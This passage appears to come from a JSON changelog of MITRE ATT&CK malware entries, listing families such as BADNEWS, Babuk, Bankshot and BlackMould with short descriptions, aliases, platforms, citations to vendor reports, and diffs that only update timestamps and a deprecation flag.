14:44:59.677000+00:00", + "name": "BADNEWS", + "description": "[BADNEWS](https://attack.mitre.org/software/S0128) is malware that has been used by the actors responsible for the [Patchwork](https://attack.mitre.org/groups/G0040) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. 
(Citation: Forcepoint Monsoon) (Citation: TrendMicro Patchwork Dec 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0128", + "external_id": "S0128" + }, + { + "source_name": "BADNEWS", + "description": "(Citation: Forcepoint Monsoon)" + }, + { + "source_name": "Forcepoint Monsoon", + "description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.", + "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + }, + { + "source_name": "TrendMicro Patchwork Dec 2017", + "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.", + "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BADNEWS" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:59.677000+00:00\", \"old_value\": \"2025-04-16 20:38:41.446000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-10 18:00:28.497000+00:00", + "modified": "2025-04-25 14:45:02.531000+00:00", + "name": "BBK", + "description": "[BBK](https://attack.mitre.org/software/S0470) is a downloader that 
has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0470", + "external_id": "S0470" + }, + { + "source_name": "Trend Micro Tick November 2019", + "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.", + "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BBK" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:02.531000+00:00\", \"old_value\": \"2025-04-16 20:38:42.578000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--64d76fa5-cf8f-469c-b78c-1a4f7c5bad80", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:13.664000+00:00", + "modified": "2025-04-25 14:43:36.304000+00:00", + "name": "BBSRAT", + "description": "[BBSRAT](https://attack.mitre.org/software/S0127) is malware with remote access tool functionality that has been used in targeted compromises. 
(Citation: Palo Alto Networks BBSRAT)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0127", + "external_id": "S0127" + }, + { + "source_name": "Palo Alto Networks BBSRAT", + "description": "Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BBSRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:36.304000+00:00\", \"old_value\": \"2025-04-16 20:38:13.507000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--d5268dfb-ae2b-4e0e-ac07-02a460613d8a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-02-18 20:16:12.119000+00:00", + "modified": "2025-04-25 14:44:47.458000+00:00", + "name": "BONDUPDATER", + "description": "[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). 
It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0360", + "external_id": "S0360" + }, + { + "source_name": "FireEye APT34 Dec 2017", + "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html" + }, + { + "source_name": "Palo Alto OilRig Sep 2018", + "description": "Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. 
Retrieved February 18, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BONDUPDATER" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:47.458000+00:00\", \"old_value\": \"2025-04-16 20:38:37.261000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--67fc172a-36fa-4a35-88eb-4ba730ed52a6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:15.994000+00:00", + "modified": "2025-04-25 14:43:38.100000+00:00", + "name": "BS2005", + "description": "[BS2005](https://attack.mitre.org/software/S0014) is malware that was used by [Ke3chang](https://attack.mitre.org/groups/G0004) in spearphishing campaigns since at least 2011. (Citation: Mandiant Operation Ke3chang November 2014)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0014", + "external_id": "S0014" + }, + { + "source_name": "Mandiant Operation Ke3chang November 2014", + "description": "Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION \u201cKE3CHANG\u201d: Targeted Attacks Against Ministries of Foreign Affairs. 
Retrieved November 12, 2014.", + "url": "https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BS2005" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:38.100000+00:00\", \"old_value\": \"2025-04-16 20:38:14.043000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--123bd7b3-675c-4b1a-8482-c55782b20e2b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:33.738000+00:00", + "modified": "2025-04-25 14:42:44.013000+00:00", + "name": "BUBBLEWRAP", + "description": "[BUBBLEWRAP](https://attack.mitre.org/software/S0043) is a full-featured, second-stage backdoor used by the [admin@338](https://attack.mitre.org/groups/G0018) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. (Citation: FireEye admin@338)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0043", + "external_id": "S0043" + }, + { + "source_name": "FireEye admin@338", + "description": "FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. 
Retrieved December 4, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BUBBLEWRAP", + "Backdoor.APT.FakeWinHTTPHelper" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:44.013000+00:00\", \"old_value\": \"2025-04-16 20:37:56.566000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--61c7a91a-0b83-461d-ad32-75d96eed4a09", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-11 17:36:46.197000+00:00", + "modified": "2025-04-25 14:43:34.138000+00:00", + "name": "Babuk", + "description": "[Babuk](https://attack.mitre.org/software/S0638) is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. 
The operators of [Babuk](https://attack.mitre.org/software/S0638) employ a \"Big Game Hunting\" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: CyberScoop Babuk February 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0638", + "external_id": "S0638" + }, + { + "source_name": "Babyk", + "description": "(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)" + }, + { + "source_name": "Vasa Locker", + "description": "(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)" + }, + { + "source_name": "Sogeti CERT ESEC Babuk March 2021", + "description": "Sogeti. (2021, March). Babuk Ransomware. Retrieved August 11, 2021.", + "url": "https://www.sogeti.com/globalassets/reports/cybersecchronicles_-_babuk.pdf" + }, + { + "source_name": "McAfee Babuk February 2021", + "description": "Mundo, A. et al. (2021, February). Technical Analysis of Babuk Ransomware. Retrieved August 11, 2021.", + "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf" + }, + { + "source_name": "CyberScoop Babuk February 2021", + "description": "Lyngaas, S. (2021, February 4). Meet Babuk, a ransomware attacker blamed for the Serco breach. Retrieved August 11, 2021.", + "url": "https://www.cyberscoop.com/babuk-ransomware-serco-attack/" + }, + { + "source_name": "Trend Micro Ransomware February 2021", + "description": "Centero, R. et al. (2021, February 5). New in Ransomware: Seth-Locker, Babuk Locker, Maoloa, TeslaCrypt, and CobraLocker. 
Retrieved August 11, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Babuk", + "Babyk", + "Vasa Locker" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Hiroki Nagahama, NEC Corporation", + "Pooja Natarajan, NEC Corporation India", + "Manikantan Srinivasan, NEC Corporation India", + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:34.138000+00:00\", \"old_value\": \"2025-04-16 20:38:12.880000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--9af05de0-bc09-4511-a350-5eb8b06185c1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-29 21:33:34.082000+00:00", + "modified": "2025-04-25 14:44:11.108000+00:00", + "name": "BadPatch", + "description": "[BadPatch](https://attack.mitre.org/software/S0337) is a Windows Trojan that was used in a Gaza Hackers-linked campaign.(Citation: Unit 42 BadPatch Oct 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0337", + "external_id": "S0337" + }, + { + "source_name": "BadPatch", + "description": "(Citation: Unit 42 BadPatch Oct 2017)" + }, + { + "source_name": "Unit 42 BadPatch Oct 2017", + "description": "Bar, T., Conant, S. (2017, October 20). BadPatch. 
Retrieved November 13, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/10/unit42-badpatch/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BadPatch" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:11.108000+00:00\", \"old_value\": \"2025-04-16 20:38:25.897000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--835a79f1-842d-472d-b8f4-d54b545c341b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:43:54.316000+00:00", + "name": "Bandook", + "description": "[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. [Bandook](https://attack.mitre.org/software/S0234) has been used by [Dark Caracal](https://attack.mitre.org/groups/G0070), as well as in a separate campaign referred to as \"Operation Manul\".(Citation: EFF Manul Aug 2016)(Citation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint Bandook Nov 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0234", + "external_id": "S0234" + }, + { + "source_name": "EFF Manul Aug 2016", + "description": "Galperin, E., Et al.. 
(2016, August). I Got a Letter From the Government the Other Day.... Retrieved April 25, 2018.", + "url": "https://www.eff.org/files/2016/08/03/i-got-a-letter-from-the-government.pdf" + }, + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + }, + { + "source_name": "CheckPoint Bandook Nov 2020", + "description": "Check Point. (2020, November 26). Bandook: Signed & Delivered. Retrieved May 31, 2021.", + "url": "https://research.checkpoint.com/2020/bandook-signed-delivered/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Bandook" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:54.316000+00:00\", \"old_value\": \"2025-04-16 20:38:20.706000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--1f6e3702-7ca1-4582-b2e7-4591297d05a8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:42:48.512000+00:00", + "name": "Bankshot", + "description": "[Bankshot](https://attack.mitre.org/software/S0239) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. 
In 2018, [Lazarus Group](https://attack.mitre.org/groups/G0032) used the [Bankshot](https://attack.mitre.org/software/S0239) implant in attacks against the Turkish financial sector. (Citation: McAfee Bankshot)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0239", + "external_id": "S0239" + }, + { + "source_name": "Bankshot", + "description": "(Citation: McAfee Bankshot)" + }, + { + "source_name": "Trojan Manuscript", + "description": "(Citation: McAfee Bankshot)" + }, + { + "source_name": "McAfee Bankshot", + "description": "Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.", + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Bankshot", + "Trojan Manuscript" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:48.512000+00:00\", \"old_value\": \"2025-04-16 20:37:57.714000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--63c4511b-2d6e-4bb2-b582-e2e99a8a467d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-01-14 19:58:17.917000+00:00", + "modified": "2025-04-25 14:43:35.224000+00:00", + "name": "BlackMould", + "description": "[BlackMould](https://attack.mitre.org/software/S0564) is a web shell based on [China 
Chopper](https://attack.mitre.org/software/S0020) for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by [GALLIUM](https://attack.mitre.org/groups/G0093) against telecommunication providers.(Citation: Microsoft GALLIUM December 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0564", + "external_id": "S0564" + }, + { + "source_name": "Microsoft GALLIUM December 2019", + "description": "MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021.", + "url": "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BlackMould" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:35.224000+00:00\", \"old_value\": \"2025-04-16 20:38:13.187000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--4c6d62c2-89f5-4159-8fab-0190b1f9d328", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-16 14:59:40.051000+00:00", + "modified": "2025-04-25 14:43:14.836000+00:00", + "name": "Bonadan", + "description": "[Bonadan](https://attack.mitre.org/software/S0486) is a malicious version of OpenSSH which acts as a custom backdoor. 
[Bonadan](https://attack.mitre.org/software/S0486) has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.(Citation: ESET ForSSHe December 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0486", + "external_id": "S0486" + }, + { + "source_name": "ESET ForSSHe December 2018", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Bonadan" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:14.836000+00:00\", \"old_value\": \"2025-04-16 20:38:06.109000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--c26f1c05-b861-4970-94dc-2f7f921a3074", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-03 14:55:46.682000+00:00", + "modified": "2025-04-25 14:44:37.490000+00:00", + "name": "BoomBox", + "description": "[BoomBox](https://attack.mitre.org/software/S0635) is a downloader responsible for executing next stage components that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium 
Toolset May 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0635", + "external_id": "S0635" + }, + { + "source_name": "MSTIC Nobelium Toolset May 2021", + "description": "MSTIC. (2021, May 28). Breaking down NOBELIUM\u2019s latest early-stage toolset. Retrieved August 4, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BoomBox" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:37.490000+00:00\", \"old_value\": \"2025-04-16 20:38:34.236000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--919a056e-5104-43b9-ad55-2ac929108b71", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-27 20:50:56.335000+00:00", + "modified": "2025-04-25 14:44:03.536000+00:00", + "name": "BoxCaon", + "description": "[BoxCaon](https://attack.mitre.org/software/S0651) is a Windows backdoor that was used by [IndigoZebra](https://attack.mitre.org/groups/G0136) in a 2021 spearphishing campaign against Afghan government officials. 
[BoxCaon](https://attack.mitre.org/software/S0651)'s name stems from similarities shared with the malware family [xCaon](https://attack.mitre.org/software/S0653).(Citation: Checkpoint IndigoZebra July 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0651", + "external_id": "S0651" + }, + { + "source_name": "BoxCaon", + "description": "(Citation: Checkpoint IndigoZebra July 2021)(Citation: HackerNews IndigoZebra July 2021)" + }, + { + "source_name": "Checkpoint IndigoZebra July 2021", + "description": "CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.", + "url": "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/" + }, + { + "source_name": "HackerNews IndigoZebra July 2021", + "description": "Lakshmanan, R.. (2021, July 1). IndigoZebra APT Hacking Campaign Targets the Afghan Government. 
Retrieved September 24, 2021.", + "url": "https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "BoxCaon" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Yoshihiro Kori, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:03.536000+00:00\", \"old_value\": \"2025-04-16 20:38:23.138000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-01 19:34:28.366000+00:00", + "modified": "2025-04-25 14:43:50.199000+00:00", + "name": "Bundlore", + "description": "[Bundlore](https://attack.mitre.org/software/S0482) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://attack.mitre.org/software/S0482) has many features associated with more traditional backdoors.(Citation: MacKeeper Bundlore Apr 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0482", + "external_id": "S0482" + }, + { + "source_name": "OSX.Bundlore", + "description": "(Citation: MacKeeper Bundlore Apr 2019)" + }, + { + "source_name": "MacKeeper Bundlore Apr 2019", + "description": "Sushko, O. (2019, April 17). 
